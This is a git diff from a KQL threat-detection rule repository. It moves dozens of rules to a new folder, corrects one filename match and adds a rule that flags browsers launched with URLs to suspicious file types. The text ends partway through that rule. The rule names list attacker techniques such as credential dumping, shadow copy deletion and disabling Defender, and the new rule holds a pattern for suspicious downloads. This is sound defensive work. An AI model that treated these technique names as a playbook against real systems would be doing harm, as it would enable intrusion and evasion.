b/KQL/rules/windows/process_creation/compressed_file_creation_via_tar_exe.kql similarity index 100% rename from KQL/rules/Collection/compressed_file_creation_via_tar_exe.kql rename to KQL/rules/windows/process_creation/compressed_file_creation_via_tar_exe.kql diff --git a/KQL/rules/Collection/compressed_file_extraction_via_tar_exe.kql b/KQL/rules/windows/process_creation/compressed_file_extraction_via_tar_exe.kql similarity index 100% rename from KQL/rules/Collection/compressed_file_extraction_via_tar_exe.kql rename to KQL/rules/windows/process_creation/compressed_file_extraction_via_tar_exe.kql diff --git a/KQL/rules/Discovery/computer_discovery_and_export_via_get_adcomputer_cmdlet.kql b/KQL/rules/windows/process_creation/computer_discovery_and_export_via_get_adcomputer_cmdlet.kql similarity index 100% rename from KQL/rules/Discovery/computer_discovery_and_export_via_get_adcomputer_cmdlet.kql rename to KQL/rules/windows/process_creation/computer_discovery_and_export_via_get_adcomputer_cmdlet.kql diff --git a/KQL/rules/Execution/computer_password_change_via_ksetup_exe.kql b/KQL/rules/windows/process_creation/computer_password_change_via_ksetup_exe.kql similarity index 100% rename from KQL/rules/Execution/computer_password_change_via_ksetup_exe.kql rename to KQL/rules/windows/process_creation/computer_password_change_via_ksetup_exe.kql diff --git a/KQL/rules/Discovery/computer_system_reconnaissance_via_wmic_exe.kql b/KQL/rules/windows/process_creation/computer_system_reconnaissance_via_wmic_exe.kql similarity index 100% rename from KQL/rules/Discovery/computer_system_reconnaissance_via_wmic_exe.kql rename to KQL/rules/windows/process_creation/computer_system_reconnaissance_via_wmic_exe.kql diff --git a/KQL/rules/Execution/conhost_exe_commandline_path_traversal.kql b/KQL/rules/windows/process_creation/conhost_exe_commandline_path_traversal.kql similarity index 100% rename from KQL/rules/Execution/conhost_exe_commandline_path_traversal.kql rename to KQL/rules/windows/process_creation/conhost_exe_commandline_path_traversal.kql diff --git a/KQL/rules/Execution/conhost_spawned_by_uncommon_parent_process.kql b/KQL/rules/windows/process_creation/conhost_spawned_by_uncommon_parent_process.kql similarity index 100% rename from KQL/rules/Execution/conhost_spawned_by_uncommon_parent_process.kql rename to KQL/rules/windows/process_creation/conhost_spawned_by_uncommon_parent_process.kql diff --git a/KQL/rules/Discovery/console_codepage_lookup_via_chcp.kql b/KQL/rules/windows/process_creation/console_codepage_lookup_via_chcp.kql similarity index 100% rename from KQL/rules/Discovery/console_codepage_lookup_via_chcp.kql rename to KQL/rules/windows/process_creation/console_codepage_lookup_via_chcp.kql diff --git a/KQL/rules/Privilege Escalation/control_panel_items.kql b/KQL/rules/windows/process_creation/control_panel_items.kql similarity index 100% rename from KQL/rules/Privilege Escalation/control_panel_items.kql rename to KQL/rules/windows/process_creation/control_panel_items.kql diff --git a/KQL/rules/Defense Evasion/convertto_securestring_cmdlet_usage_via_commandline.kql b/KQL/rules/windows/process_creation/convertto_securestring_cmdlet_usage_via_commandline.kql similarity index 100% rename from KQL/rules/Defense Evasion/convertto_securestring_cmdlet_usage_via_commandline.kql rename to KQL/rules/windows/process_creation/convertto_securestring_cmdlet_usage_via_commandline.kql diff --git a/KQL/rules/Credential Access/copy_dmp_dump_files_from_remote_share_via_cmd_exe.kql b/KQL/rules/windows/process_creation/copy_dmp_dump_files_from_remote_share_via_cmd_exe.kql similarity index 100% rename from KQL/rules/Credential Access/copy_dmp_dump_files_from_remote_share_via_cmd_exe.kql rename to KQL/rules/windows/process_creation/copy_dmp_dump_files_from_remote_share_via_cmd_exe.kql diff --git a/KQL/rules/Lateral Movement/copy_from_or_to_admin_share_or_sysvol_folder.kql b/KQL/rules/windows/process_creation/copy_from_or_to_admin_share_or_sysvol_folder.kql similarity index 100% rename from KQL/rules/Lateral Movement/copy_from_or_to_admin_share_or_sysvol_folder.kql rename to KQL/rules/windows/process_creation/copy_from_or_to_admin_share_or_sysvol_folder.kql diff --git a/KQL/rules/Impact/copy_from_volumeshadowcopy_via_cmd_exe.kql b/KQL/rules/windows/process_creation/copy_from_volumeshadowcopy_via_cmd_exe.kql similarity index 100% rename from KQL/rules/Impact/copy_from_volumeshadowcopy_via_cmd_exe.kql rename to KQL/rules/windows/process_creation/copy_from_volumeshadowcopy_via_cmd_exe.kql diff --git a/KQL/rules/Credential Access/copying_sensitive_files_with_credential_data.kql b/KQL/rules/windows/process_creation/copying_sensitive_files_with_credential_data.kql similarity index 100% rename from KQL/rules/Credential Access/copying_sensitive_files_with_credential_data.kql rename to KQL/rules/windows/process_creation/copying_sensitive_files_with_credential_data.kql diff --git a/KQL/rules/Defense Evasion/createdump_process_dump.kql b/KQL/rules/windows/process_creation/createdump_process_dump.kql similarity index 100% rename from KQL/rules/Defense Evasion/createdump_process_dump.kql rename to KQL/rules/windows/process_creation/createdump_process_dump.kql diff --git a/KQL/rules/Execution/csc_exe_execution_form_potentially_suspicious_parent.kql b/KQL/rules/windows/process_creation/csc_exe_execution_form_potentially_suspicious_parent.kql similarity index 100% rename from KQL/rules/Execution/csc_exe_execution_form_potentially_suspicious_parent.kql rename to KQL/rules/windows/process_creation/csc_exe_execution_form_potentially_suspicious_parent.kql diff --git a/KQL/rules/Execution/cscript_wscript_potentially_suspicious_child_process.kql b/KQL/rules/windows/process_creation/cscript_wscript_potentially_suspicious_child_process.kql similarity index 100% rename from KQL/rules/Execution/cscript_wscript_potentially_suspicious_child_process.kql rename to KQL/rules/windows/process_creation/cscript_wscript_potentially_suspicious_child_process.kql diff --git a/KQL/rules/Execution/cscript_wscript_uncommon_script_extension_execution.kql b/KQL/rules/windows/process_creation/cscript_wscript_uncommon_script_extension_execution.kql similarity index 100% rename from KQL/rules/Execution/cscript_wscript_uncommon_script_extension_execution.kql rename to KQL/rules/windows/process_creation/cscript_wscript_uncommon_script_extension_execution.kql diff --git a/KQL/rules/Defense Evasion/curl_download_and_execute_combination.kql b/KQL/rules/windows/process_creation/curl_download_and_execute_combination.kql similarity index 100% rename from KQL/rules/Defense Evasion/curl_download_and_execute_combination.kql rename to KQL/rules/windows/process_creation/curl_download_and_execute_combination.kql diff --git a/KQL/rules/Execution/curl_web_request_with_potential_custom_user_agent.kql b/KQL/rules/windows/process_creation/curl_web_request_with_potential_custom_user_agent.kql similarity index 100% rename from KQL/rules/Execution/curl_web_request_with_potential_custom_user_agent.kql rename to KQL/rules/windows/process_creation/curl_web_request_with_potential_custom_user_agent.kql diff --git a/KQL/rules/Collection/data_copied_to_clipboard_via_clip_exe.kql b/KQL/rules/windows/process_creation/data_copied_to_clipboard_via_clip_exe.kql similarity index 100% rename from KQL/rules/Collection/data_copied_to_clipboard_via_clip_exe.kql rename to KQL/rules/windows/process_creation/data_copied_to_clipboard_via_clip_exe.kql diff --git a/KQL/rules/Execution/data_export_from_mssql_table_via_bcp_exe.kql b/KQL/rules/windows/process_creation/data_export_from_mssql_table_via_bcp_exe.kql similarity index 100% rename from KQL/rules/Execution/data_export_from_mssql_table_via_bcp_exe.kql rename to KQL/rules/windows/process_creation/data_export_from_mssql_table_via_bcp_exe.kql diff --git a/KQL/rules/Impact/delete_all_scheduled_tasks.kql b/KQL/rules/windows/process_creation/delete_all_scheduled_tasks.kql similarity index 100% rename from KQL/rules/Impact/delete_all_scheduled_tasks.kql rename to KQL/rules/windows/process_creation/delete_all_scheduled_tasks.kql diff --git a/KQL/rules/Impact/delete_important_scheduled_task.kql b/KQL/rules/windows/process_creation/delete_important_scheduled_task.kql similarity index 100% rename from KQL/rules/Impact/delete_important_scheduled_task.kql rename to KQL/rules/windows/process_creation/delete_important_scheduled_task.kql diff --git a/KQL/rules/Impact/deleted_data_overwritten_via_cipher_exe.kql b/KQL/rules/windows/process_creation/deleted_data_overwritten_via_cipher_exe.kql similarity index 100% rename from KQL/rules/Impact/deleted_data_overwritten_via_cipher_exe.kql rename to KQL/rules/windows/process_creation/deleted_data_overwritten_via_cipher_exe.kql diff --git a/KQL/rules/Impact/deletion_of_volume_shadow_copies_via_wmi_with_powershell.kql b/KQL/rules/windows/process_creation/deletion_of_volume_shadow_copies_via_wmi_with_powershell.kql similarity index 100% rename from KQL/rules/Impact/deletion_of_volume_shadow_copies_via_wmi_with_powershell.kql rename to KQL/rules/windows/process_creation/deletion_of_volume_shadow_copies_via_wmi_with_powershell.kql diff --git a/KQL/rules/Privilege Escalation/deny_service_access_using_security_descriptor_tampering_via_sc_exe.kql b/KQL/rules/windows/process_creation/deny_service_access_using_security_descriptor_tampering_via_sc_exe.kql similarity index 100% rename from KQL/rules/Privilege Escalation/deny_service_access_using_security_descriptor_tampering_via_sc_exe.kql rename to KQL/rules/windows/process_creation/deny_service_access_using_security_descriptor_tampering_via_sc_exe.kql diff --git a/KQL/rules/Discovery/detected_windows_software_discovery.kql b/KQL/rules/windows/process_creation/detected_windows_software_discovery.kql similarity index 100% rename from KQL/rules/Discovery/detected_windows_software_discovery.kql rename to KQL/rules/windows/process_creation/detected_windows_software_discovery.kql diff --git a/KQL/rules/Execution/detection_of_powershell_execution_via_sqlps_exe.kql b/KQL/rules/windows/process_creation/detection_of_powershell_execution_via_sqlps_exe.kql similarity index 100% rename from KQL/rules/Execution/detection_of_powershell_execution_via_sqlps_exe.kql rename to KQL/rules/windows/process_creation/detection_of_powershell_execution_via_sqlps_exe.kql diff --git a/KQL/rules/Defense Evasion/devicecredentialdeployment_execution.kql b/KQL/rules/windows/process_creation/devicecredentialdeployment_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/devicecredentialdeployment_execution.kql rename to KQL/rules/windows/process_creation/devicecredentialdeployment_execution.kql diff --git a/KQL/rules/Defense Evasion/devtoolslauncher_exe_executes_specified_binary.kql b/KQL/rules/windows/process_creation/devtoolslauncher_exe_executes_specified_binary.kql similarity index 100% rename from KQL/rules/Defense Evasion/devtoolslauncher_exe_executes_specified_binary.kql rename to KQL/rules/windows/process_creation/devtoolslauncher_exe_executes_specified_binary.kql diff --git a/KQL/rules/Privilege Escalation/direct_autorun_keys_modification.kql b/KQL/rules/windows/process_creation/direct_autorun_keys_modification.kql similarity index 100% rename from KQL/rules/Privilege Escalation/direct_autorun_keys_modification.kql rename to KQL/rules/windows/process_creation/direct_autorun_keys_modification.kql diff --git a/KQL/rules/Defense Evasion/directory_removal_via_rmdir.kql b/KQL/rules/windows/process_creation/directory_removal_via_rmdir.kql similarity index 100% rename from KQL/rules/Defense Evasion/directory_removal_via_rmdir.kql rename to KQL/rules/windows/process_creation/directory_removal_via_rmdir.kql diff --git a/KQL/rules/Discovery/dirlister_execution.kql b/KQL/rules/windows/process_creation/dirlister_execution.kql similarity index 92% rename from KQL/rules/Discovery/dirlister_execution.kql rename to KQL/rules/windows/process_creation/dirlister_execution.kql index 4129cbf9..acce8563 100644 --- a/KQL/rules/Discovery/dirlister_execution.kql +++ b/KQL/rules/windows/process_creation/dirlister_execution.kql @@ -9,4 +9,4 @@ // - Legitimate use by users DeviceProcessEvents -| where ProcessVersionInfoOriginalFileName =~ "DirLister.exe" or FolderPath endswith "\\dirlister.exe" \ No newline at end of file +| where ProcessVersionInfoOriginalFileName =~ "DirLister.exe" or FolderPath endswith "\\DirLister.exe" \ No newline at end of file diff --git a/KQL/rules/Impact/disable_important_scheduled_task.kql b/KQL/rules/windows/process_creation/disable_important_scheduled_task.kql similarity index 100% rename from KQL/rules/Impact/disable_important_scheduled_task.kql rename to KQL/rules/windows/process_creation/disable_important_scheduled_task.kql diff --git a/KQL/rules/Defense Evasion/disable_windows_defender_av_security_monitoring.kql b/KQL/rules/windows/process_creation/disable_windows_defender_av_security_monitoring.kql similarity index 100% rename from KQL/rules/Defense Evasion/disable_windows_defender_av_security_monitoring.kql rename to KQL/rules/windows/process_creation/disable_windows_defender_av_security_monitoring.kql diff --git a/KQL/rules/Defense Evasion/disable_windows_iis_http_logging.kql b/KQL/rules/windows/process_creation/disable_windows_iis_http_logging.kql similarity index 100% rename from KQL/rules/Defense Evasion/disable_windows_iis_http_logging.kql rename to KQL/rules/windows/process_creation/disable_windows_iis_http_logging.kql diff --git a/KQL/rules/Defense Evasion/disabled_ie_security_features.kql b/KQL/rules/windows/process_creation/disabled_ie_security_features.kql similarity index 100% rename from KQL/rules/Defense Evasion/disabled_ie_security_features.kql rename to KQL/rules/windows/process_creation/disabled_ie_security_features.kql diff --git a/KQL/rules/Defense Evasion/disabled_volume_snapshots.kql b/KQL/rules/windows/process_creation/disabled_volume_snapshots.kql similarity index 100% rename from KQL/rules/Defense Evasion/disabled_volume_snapshots.kql rename to KQL/rules/windows/process_creation/disabled_volume_snapshots.kql diff --git a/KQL/rules/Defense Evasion/disabling_windows_defender_wmi_autologger_session_via_reg_exe.kql b/KQL/rules/windows/process_creation/disabling_windows_defender_wmi_autologger_session_via_reg_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/disabling_windows_defender_wmi_autologger_session_via_reg_exe.kql rename to KQL/rules/windows/process_creation/disabling_windows_defender_wmi_autologger_session_via_reg_exe.kql diff --git a/KQL/rules/Discovery/discovery_of_a_system_time.kql b/KQL/rules/windows/process_creation/discovery_of_a_system_time.kql similarity index 100% rename from KQL/rules/Discovery/discovery_of_a_system_time.kql rename to KQL/rules/windows/process_creation/discovery_of_a_system_time.kql diff --git a/KQL/rules/Defense Evasion/diskshadow_script_mode_execution_from_potential_suspicious_location.kql b/KQL/rules/windows/process_creation/diskshadow_script_mode_execution_from_potential_suspicious_location.kql similarity index 100% rename from KQL/rules/Defense Evasion/diskshadow_script_mode_execution_from_potential_suspicious_location.kql rename to KQL/rules/windows/process_creation/diskshadow_script_mode_execution_from_potential_suspicious_location.kql diff --git a/KQL/rules/Defense Evasion/diskshadow_script_mode_uncommon_script_extension_execution.kql b/KQL/rules/windows/process_creation/diskshadow_script_mode_uncommon_script_extension_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/diskshadow_script_mode_uncommon_script_extension_execution.kql rename to KQL/rules/windows/process_creation/diskshadow_script_mode_uncommon_script_extension_execution.kql diff --git a/KQL/rules/Defense Evasion/dism_remove_online_package.kql b/KQL/rules/windows/process_creation/dism_remove_online_package.kql similarity index 100% rename from KQL/rules/Defense Evasion/dism_remove_online_package.kql rename to KQL/rules/windows/process_creation/dism_remove_online_package.kql diff --git a/KQL/rules/Defense Evasion/dll_execution_via_rasautou_exe.kql b/KQL/rules/windows/process_creation/dll_execution_via_rasautou_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/dll_execution_via_rasautou_exe.kql rename to KQL/rules/windows/process_creation/dll_execution_via_rasautou_exe.kql diff --git a/KQL/rules/Privilege Escalation/dll_execution_via_register_cimprovider_exe.kql b/KQL/rules/windows/process_creation/dll_execution_via_register_cimprovider_exe.kql similarity index 100% rename from KQL/rules/Privilege Escalation/dll_execution_via_register_cimprovider_exe.kql rename to KQL/rules/windows/process_creation/dll_execution_via_register_cimprovider_exe.kql diff --git a/KQL/rules/Defense Evasion/dll_loaded_via_certoc_exe.kql b/KQL/rules/windows/process_creation/dll_loaded_via_certoc_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/dll_loaded_via_certoc_exe.kql rename to KQL/rules/windows/process_creation/dll_loaded_via_certoc_exe.kql diff --git a/KQL/rules/Privilege Escalation/dll_sideloading_by_vmware_xfer_utility.kql b/KQL/rules/windows/process_creation/dll_sideloading_by_vmware_xfer_utility.kql similarity index 100% rename from KQL/rules/Privilege Escalation/dll_sideloading_by_vmware_xfer_utility.kql rename to KQL/rules/windows/process_creation/dll_sideloading_by_vmware_xfer_utility.kql diff --git a/KQL/rules/Privilege Escalation/dllhost_exe_execution_anomaly.kql b/KQL/rules/windows/process_creation/dllhost_exe_execution_anomaly.kql similarity index 100% rename from KQL/rules/Privilege Escalation/dllhost_exe_execution_anomaly.kql rename to KQL/rules/windows/process_creation/dllhost_exe_execution_anomaly.kql diff --git a/KQL/rules/Defense Evasion/dllunregisterserver_function_call_via_msiexec_exe.kql b/KQL/rules/windows/process_creation/dllunregisterserver_function_call_via_msiexec_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/dllunregisterserver_function_call_via_msiexec_exe.kql rename to KQL/rules/windows/process_creation/dllunregisterserver_function_call_via_msiexec_exe.kql diff --git a/KQL/rules/Exfiltration/dns_exfiltration_and_tunneling_tools_execution.kql b/KQL/rules/windows/process_creation/dns_exfiltration_and_tunneling_tools_execution.kql similarity index 100% rename from KQL/rules/Exfiltration/dns_exfiltration_and_tunneling_tools_execution.kql rename to KQL/rules/windows/process_creation/dns_exfiltration_and_tunneling_tools_execution.kql diff --git a/KQL/rules/Discovery/domain_trust_discovery_via_dsquery.kql b/KQL/rules/windows/process_creation/domain_trust_discovery_via_dsquery.kql similarity index 100% rename from KQL/rules/Discovery/domain_trust_discovery_via_dsquery.kql rename to KQL/rules/windows/process_creation/domain_trust_discovery_via_dsquery.kql diff --git a/KQL/rules/Defense Evasion/driver_dll_installation_via_odbcconf_exe.kql b/KQL/rules/windows/process_creation/driver_dll_installation_via_odbcconf_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/driver_dll_installation_via_odbcconf_exe.kql rename to KQL/rules/windows/process_creation/driver_dll_installation_via_odbcconf_exe.kql diff --git a/KQL/rules/Discovery/driverquery_exe_execution.kql b/KQL/rules/windows/process_creation/driverquery_exe_execution.kql similarity index 100% rename from KQL/rules/Discovery/driverquery_exe_execution.kql rename to KQL/rules/windows/process_creation/driverquery_exe_execution.kql diff --git a/KQL/rules/Persistence/dropping_of_password_filter_dll.kql b/KQL/rules/windows/process_creation/dropping_of_password_filter_dll.kql similarity index 100% rename from KQL/rules/Persistence/dropping_of_password_filter_dll.kql rename to KQL/rules/windows/process_creation/dropping_of_password_filter_dll.kql diff --git a/KQL/rules/Execution/dsinternals_suspicious_powershell_cmdlets.kql b/KQL/rules/windows/process_creation/dsinternals_suspicious_powershell_cmdlets.kql similarity index 100% rename from KQL/rules/Execution/dsinternals_suspicious_powershell_cmdlets.kql rename to KQL/rules/windows/process_creation/dsinternals_suspicious_powershell_cmdlets.kql diff --git a/KQL/rules/Credential Access/dumping_of_sensitive_hives_via_reg_exe.kql b/KQL/rules/windows/process_creation/dumping_of_sensitive_hives_via_reg_exe.kql similarity index 100% rename from KQL/rules/Credential Access/dumping_of_sensitive_hives_via_reg_exe.kql rename to KQL/rules/windows/process_creation/dumping_of_sensitive_hives_via_reg_exe.kql diff --git a/KQL/rules/Credential Access/dumping_process_via_sqldumper_exe.kql b/KQL/rules/windows/process_creation/dumping_process_via_sqldumper_exe.kql similarity index 100% rename from KQL/rules/Credential Access/dumping_process_via_sqldumper_exe.kql rename to KQL/rules/windows/process_creation/dumping_process_via_sqldumper_exe.kql diff --git a/KQL/rules/Defense Evasion/dumpminitool_execution.kql b/KQL/rules/windows/process_creation/dumpminitool_execution.kql similarity index 100% rename from KQL/rules/Defense Evasion/dumpminitool_execution.kql rename to KQL/rules/windows/process_creation/dumpminitool_execution.kql diff --git a/KQL/rules/Defense Evasion/dumpstack_log_defender_evasion.kql b/KQL/rules/windows/process_creation/dumpstack_log_defender_evasion.kql similarity index 100% rename from KQL/rules/Defense Evasion/dumpstack_log_defender_evasion.kql rename to KQL/rules/windows/process_creation/dumpstack_log_defender_evasion.kql diff --git a/KQL/rules/Defense Evasion/dynamic_net_compilation_via_csc_exe.kql b/KQL/rules/windows/process_creation/dynamic_net_compilation_via_csc_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/dynamic_net_compilation_via_csc_exe.kql rename to KQL/rules/windows/process_creation/dynamic_net_compilation_via_csc_exe.kql diff --git a/KQL/rules/Exfiltration/email_exifiltration_via_powershell.kql b/KQL/rules/windows/process_creation/email_exifiltration_via_powershell.kql similarity index 100% rename from KQL/rules/Exfiltration/email_exifiltration_via_powershell.kql rename to KQL/rules/windows/process_creation/email_exifiltration_via_powershell.kql diff --git a/KQL/rules/Persistence/enable_lm_hash_storage_proccreation.kql b/KQL/rules/windows/process_creation/enable_lm_hash_storage_proccreation.kql similarity index 100% rename from KQL/rules/Persistence/enable_lm_hash_storage_proccreation.kql rename to KQL/rules/windows/process_creation/enable_lm_hash_storage_proccreation.kql diff --git a/KQL/rules/Discovery/enumerate_all_information_with_whoami_exe.kql b/KQL/rules/windows/process_creation/enumerate_all_information_with_whoami_exe.kql similarity index 100% rename from KQL/rules/Discovery/enumerate_all_information_with_whoami_exe.kql rename to KQL/rules/windows/process_creation/enumerate_all_information_with_whoami_exe.kql diff --git a/KQL/rules/Credential Access/enumeration_for_3rd_party_creds_from_cli.kql b/KQL/rules/windows/process_creation/enumeration_for_3rd_party_creds_from_cli.kql similarity index 100% rename from KQL/rules/Credential Access/enumeration_for_3rd_party_creds_from_cli.kql rename to KQL/rules/windows/process_creation/enumeration_for_3rd_party_creds_from_cli.kql diff --git a/KQL/rules/Credential Access/enumeration_for_credentials_in_registry.kql b/KQL/rules/windows/process_creation/enumeration_for_credentials_in_registry.kql similarity index 100% rename from KQL/rules/Credential Access/enumeration_for_credentials_in_registry.kql rename to KQL/rules/windows/process_creation/enumeration_for_credentials_in_registry.kql diff --git a/KQL/rules/Credential Access/esentutl_gather_credentials.kql b/KQL/rules/windows/process_creation/esentutl_gather_credentials.kql similarity index 100% rename from KQL/rules/Credential Access/esentutl_gather_credentials.kql rename to KQL/rules/windows/process_creation/esentutl_gather_credentials.kql diff --git a/KQL/rules/Collection/esentutl_steals_browser_information.kql b/KQL/rules/windows/process_creation/esentutl_steals_browser_information.kql similarity index 100% rename from KQL/rules/Collection/esentutl_steals_browser_information.kql rename to KQL/rules/windows/process_creation/esentutl_steals_browser_information.kql diff --git a/KQL/rules/Defense Evasion/etw_logging_tamper_in_net_processes_via_commandline.kql b/KQL/rules/windows/process_creation/etw_logging_tamper_in_net_processes_via_commandline.kql similarity index 100% rename from KQL/rules/Defense Evasion/etw_logging_tamper_in_net_processes_via_commandline.kql rename to KQL/rules/windows/process_creation/etw_logging_tamper_in_net_processes_via_commandline.kql diff --git a/KQL/rules/Defense Evasion/etw_trace_evasion_activity.kql b/KQL/rules/windows/process_creation/etw_trace_evasion_activity.kql similarity index 100% rename from KQL/rules/Defense Evasion/etw_trace_evasion_activity.kql rename to KQL/rules/windows/process_creation/etw_trace_evasion_activity.kql diff --git a/KQL/rules/Execution/exchange_powershell_snap_ins_usage.kql b/KQL/rules/windows/process_creation/exchange_powershell_snap_ins_usage.kql similarity index 100% rename from KQL/rules/Execution/exchange_powershell_snap_ins_usage.kql rename to KQL/rules/windows/process_creation/exchange_powershell_snap_ins_usage.kql diff --git a/KQL/rules/Execution/execute_code_with_pester_bat.kql b/KQL/rules/windows/process_creation/execute_code_with_pester_bat.kql similarity index 100% rename from KQL/rules/Execution/execute_code_with_pester_bat.kql rename to KQL/rules/windows/process_creation/execute_code_with_pester_bat.kql diff --git a/KQL/rules/Execution/execute_code_with_pester_bat_as_parent.kql b/KQL/rules/windows/process_creation/execute_code_with_pester_bat_as_parent.kql similarity index 100% rename from KQL/rules/Execution/execute_code_with_pester_bat_as_parent.kql rename to KQL/rules/windows/process_creation/execute_code_with_pester_bat_as_parent.kql diff --git a/KQL/rules/Defense Evasion/execute_files_with_msdeploy_exe.kql b/KQL/rules/windows/process_creation/execute_files_with_msdeploy_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/execute_files_with_msdeploy_exe.kql rename to KQL/rules/windows/process_creation/execute_files_with_msdeploy_exe.kql diff --git a/KQL/rules/Defense Evasion/execute_from_alternate_data_streams.kql b/KQL/rules/windows/process_creation/execute_from_alternate_data_streams.kql similarity index 100% rename from KQL/rules/Defense Evasion/execute_from_alternate_data_streams.kql rename to KQL/rules/windows/process_creation/execute_from_alternate_data_streams.kql diff --git a/KQL/rules/Defense Evasion/execute_pcwrun_exe_to_leverage_follina.kql b/KQL/rules/windows/process_creation/execute_pcwrun_exe_to_leverage_follina.kql similarity index 100% rename from KQL/rules/Defense Evasion/execute_pcwrun_exe_to_leverage_follina.kql rename to KQL/rules/windows/process_creation/execute_pcwrun_exe_to_leverage_follina.kql diff --git a/KQL/rules/Defense Evasion/execution_of_non_existing_file.kql b/KQL/rules/windows/process_creation/execution_of_non_existing_file.kql similarity index 100% rename from KQL/rules/Defense Evasion/execution_of_non_existing_file.kql rename to KQL/rules/windows/process_creation/execution_of_non_existing_file.kql diff --git a/KQL/rules/Execution/execution_of_powershell_script_in_public_folder.kql b/KQL/rules/windows/process_creation/execution_of_powershell_script_in_public_folder.kql similarity index 100% rename from KQL/rules/Execution/execution_of_powershell_script_in_public_folder.kql rename to KQL/rules/windows/process_creation/execution_of_powershell_script_in_public_folder.kql diff --git a/KQL/rules/Defense Evasion/execution_of_suspicious_file_type_extension.kql b/KQL/rules/windows/process_creation/execution_of_suspicious_file_type_extension.kql similarity index 100% rename from KQL/rules/Defense Evasion/execution_of_suspicious_file_type_extension.kql rename to KQL/rules/windows/process_creation/execution_of_suspicious_file_type_extension.kql diff --git a/KQL/rules/Defense Evasion/execution_via_stordiag_exe.kql b/KQL/rules/windows/process_creation/execution_via_stordiag_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/execution_via_stordiag_exe.kql rename to KQL/rules/windows/process_creation/execution_via_stordiag_exe.kql diff --git a/KQL/rules/Defense Evasion/execution_via_workfolders_exe.kql b/KQL/rules/windows/process_creation/execution_via_workfolders_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/execution_via_workfolders_exe.kql rename to KQL/rules/windows/process_creation/execution_via_workfolders_exe.kql diff --git a/KQL/rules/Privilege Escalation/explorer_nouaccheck_flag.kql b/KQL/rules/windows/process_creation/explorer_nouaccheck_flag.kql similarity index 100% rename from KQL/rules/Privilege Escalation/explorer_nouaccheck_flag.kql rename to KQL/rules/windows/process_creation/explorer_nouaccheck_flag.kql diff --git a/KQL/rules/Defense Evasion/explorer_process_tree_break.kql b/KQL/rules/windows/process_creation/explorer_process_tree_break.kql similarity index 100% rename from KQL/rules/Defense Evasion/explorer_process_tree_break.kql rename to KQL/rules/windows/process_creation/explorer_process_tree_break.kql diff --git a/KQL/rules/Exfiltration/exports_critical_registry_keys_to_a_file.kql b/KQL/rules/windows/process_creation/exports_critical_registry_keys_to_a_file.kql similarity index 100% rename from KQL/rules/Exfiltration/exports_critical_registry_keys_to_a_file.kql rename to KQL/rules/windows/process_creation/exports_critical_registry_keys_to_a_file.kql diff --git a/KQL/rules/Exfiltration/exports_registry_key_to_a_file.kql b/KQL/rules/windows/process_creation/exports_registry_key_to_a_file.kql similarity index 100% rename from KQL/rules/Exfiltration/exports_registry_key_to_a_file.kql rename to KQL/rules/windows/process_creation/exports_registry_key_to_a_file.kql diff --git a/KQL/rules/Discovery/file_and_subfolder_enumeration_via_dir_command.kql b/KQL/rules/windows/process_creation/file_and_subfolder_enumeration_via_dir_command.kql similarity index 100% rename from KQL/rules/Discovery/file_and_subfolder_enumeration_via_dir_command.kql rename to KQL/rules/windows/process_creation/file_and_subfolder_enumeration_via_dir_command.kql diff --git a/KQL/rules/Defense Evasion/file_decoded_from_base64_hex_via_certutil_exe.kql b/KQL/rules/windows/process_creation/file_decoded_from_base64_hex_via_certutil_exe.kql similarity index 100% rename from KQL/rules/Defense Evasion/file_decoded_from_base64_hex_via_certutil_exe.kql rename to KQL/rules/windows/process_creation/file_decoded_from_base64_hex_via_certutil_exe.kql diff --git a/KQL/rules/Execution/file_decryption_using_gpg4win.kql b/KQL/rules/windows/process_creation/file_decryption_using_gpg4win.kql similarity index 100% rename from KQL/rules/Execution/file_decryption_using_gpg4win.kql rename to KQL/rules/windows/process_creation/file_decryption_using_gpg4win.kql diff --git a/KQL/rules/Defense Evasion/file_deletion_via_del.kql b/KQL/rules/windows/process_creation/file_deletion_via_del.kql similarity index 100% rename from KQL/rules/Defense Evasion/file_deletion_via_del.kql rename to KQL/rules/windows/process_creation/file_deletion_via_del.kql diff --git a/KQL/rules/Command and Control/file_download_and_execution_via_ieexec_exe.kql b/KQL/rules/windows/process_creation/file_download_and_execution_via_ieexec_exe.kql similarity index 100% rename from KQL/rules/Command and Control/file_download_and_execution_via_ieexec_exe.kql rename to KQL/rules/windows/process_creation/file_download_and_execution_via_ieexec_exe.kql diff --git a/KQL/rules/windows/process_creation/file_download_from_browser_process_via_inline_url.kql b/KQL/rules/windows/process_creation/file_download_from_browser_process_via_inline_url.kql new file mode 100644 index 00000000..2ec8624d --- /dev/null +++ b/KQL/rules/windows/process_creation/file_download_from_browser_process_via_inline_url.kql @@ -0,0 +1,10 @@ +// Title: File Download From Browser Process Via Inline URL +// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-01-11 +// Level: medium +// Description: Detects execution of a browser process with a URL argument pointing to a file with a potentially interesting extension. This can be abused to download arbitrary files or to hide from the user for example by launching the browser in a minimized state. +// MITRE Tactic: Command and Control +// Tags: attack.command-and-control, attack.t1105 + +DeviceProcessEvents +| where ((ProcessCommandLine endswith ".7z" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".txt" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".zip") or (ProcessCommandLine contains ".7z\"" or ProcessCommandLine contains ".dat\"" or ProcessCommandLine contains ".dll\"" or ProcessCommandLine contains ".hta\"" or ProcessCommandLine contains ".ps1\"" or ProcessCommandLine contains ".psm1\"" or ProcessCommandLine contains ".txt\"" or ProcessCommandLine contains ".vbe\"" or ProcessCommandLine contains ".vbs\"" or ProcessCommandLine contains ".zip\"")) and ProcessCommandLine contains "http" and (FolderPath endswith "\\brave.exe" or FolderPath endswith "\\chrome.exe" or FolderPath endswith "\\msedge.exe" or FolderPath endswith "\\opera.exe" or 